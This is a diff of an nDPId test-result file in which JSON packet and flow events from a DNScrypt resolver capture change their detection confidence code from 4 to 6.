02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc60IgAL0RfggKAAABMw96+phfAbsGBFB4xkQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":89,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304789} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":89,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ60IAub0RotsKAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAIc60NAAL0RYccKAAABMw96+pXaAbsCCHDfxkUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":946739304791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304791,"pkt":"ZmZmZmZmRERERERECABFAADSRcUAADIREz4pT0UNCgAAAQG723EAvtvWBsGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739304793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304793,"pkt":"ZmZmZmZmRERERERECABFAADSRcgAADIREzspT0UNCgAAAQG72usAvtxZBsSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739304804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304804,"pkt":"ZmZmZmZmRERERERECABFAADSRcQAADIREz8pT0UNCgAAAQG7lPgAviJOBsOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} 
@@ -209,26 +209,26 @@ 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":946739304821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739304821,"pkt":"ZmZmZmZmRERERERECABFAADTDfVAADURyF8zD3r6CgAAAQG7mF8Av3inxkSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANmtKqgh6GipMki1mJfjDA0AnYgv5x5ccE3t3oFTaUI52T95jfN1yOwZ4Avs9tatx4lCV7PDmZkXQULOG2i1+g8X39eqNuFP4dSqiJZOoeF4tcdLtZP0Xezh1C6PMdZNUhff16o24U\/hAAAAAV9TeY1fVMsN"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1NAAL0RVBEKAAABizvIdOhUAbsCCBaGc5UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1RAAL0RVBAKAAABizvIdLjtAbsCCBaGc5EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1VAAL0RVA8KAAABizvIdMSfAbsCCBaGc5MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1YgAL0RcE4KAAABizvIdKpxAbsGBMEKc5QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA